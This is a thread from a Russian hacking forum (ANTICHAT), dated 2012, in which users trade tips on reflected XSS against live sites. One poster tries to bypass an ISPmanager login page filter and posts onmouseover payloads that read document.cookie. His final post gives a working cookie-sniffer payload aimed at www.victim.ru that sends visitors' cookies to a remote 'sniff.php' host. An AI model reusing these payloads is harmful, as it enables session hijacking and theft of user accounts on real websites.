HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 14.08.2012, 13:42
xPhoenix
Новичок
Регистрация: 09.08.2012
Сообщений: 1
С нами: 7241366

Репутация: 0
По умолчанию

мне кажется что у него уже времени на это много...
 
Ответить с цитированием

  #22  
Старый 22.09.2012, 11:50
Duskly
Познающий
Регистрация: 05.01.2012
Сообщений: 68
С нами: 7553846

Репутация: -5
По умолчанию

Я когда вставляю код в адресную строку, у меня оно срабатывает в поиске, но не как скрипт(( что делать?
 
Ответить с цитированием

  #23  
Старый 22.09.2012, 15:29
v3r7
Новичок
Регистрация: 24.09.2009
Сообщений: 14
С нами: 8752428

Репутация: 0
По умолчанию

второй раз вставляю пост если удаляете пишите пожалуйста почему? Имеется сайт,запрос вида: site/manager?alert(/x/); выкидывает меня на страницу вида https://site/manager/?alert(/x/);?alert(/x/); Там находится страница авторизации isp manager,НО запрос вида: site/manager/?'/

Код HTML:
alert(/x/);
выдаёт пустую страницу,но код этой страницы таков:

Код HTML:
location = 'https://site/manager/?'%3C/script%3E%3Cscript%3Ealert(/x/);?'%3C/script%3E%3Cscript%3Ealert(/x/);';
Насколько я понимаю, здесь соит фильтр ,который не даёт мне использовать символы ??? если мне удасться,обойти фильтрацию перекодировкой например,возможна ли здесь пассивная XSS???

...если копирую содержимое страницы на жёсткий, и там правлю, то понятное дело всё получается но как только ссылается на сайтик так лажа... что то я совсем запутался выручайте
 
Ответить с цитированием

  #24  
Старый 24.09.2012, 03:42
v3r7
Новичок
Регистрация: 24.09.2009
Сообщений: 14
С нами: 8752428

Репутация: 0
По умолчанию

xss

Вот другая ситуация есть уязвимость в форме поиска, можно испольщзовать onmouseover= и хтмл код, ява отказывается исполняться... ...У меня два вопроса, почему не хочет исполняться ява скрипт в форме или без неё и что кроме псевдо дефейса вообще возможно выжать из этого? может быть линк на тему где ИМЕННО ЭТИ вопросы обсуждены?..

Вот новая Ремарочка... ява работает в мозиле, однако отказывается в хроме и отключается в ишаке... мои два вопроса всё же актуальны,прошу подсказать
 
Ответить с цитированием

  #25  
Старый 24.09.2012, 05:38
v3r7
Новичок
Регистрация: 24.09.2009
Сообщений: 14
С нами: 8752428

Репутация: 0
По умолчанию

Вот простой для вас вопрос я думаю...

site/search/?q=" onmouseover=prompt(3333) />document.write(document.cookie);bad=
[/HTML]
 
Ответить с цитированием

  #26  
Старый 24.09.2012, 09:55
v3r7
Новичок
Регистрация: 24.09.2009
Сообщений: 14
С нами: 8752428

Репутация: 0
По умолчанию

нашёл решение для снифера, работает исключительно так:

[HTML]
www.victim.ru/search/?q=" onmouseover=/>img=new Image ();img.src="http://sniff/sniff.php?cookie="%2Bdocument.cookiebad=(( может кто-нибудь подскажет ,другие варианты?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.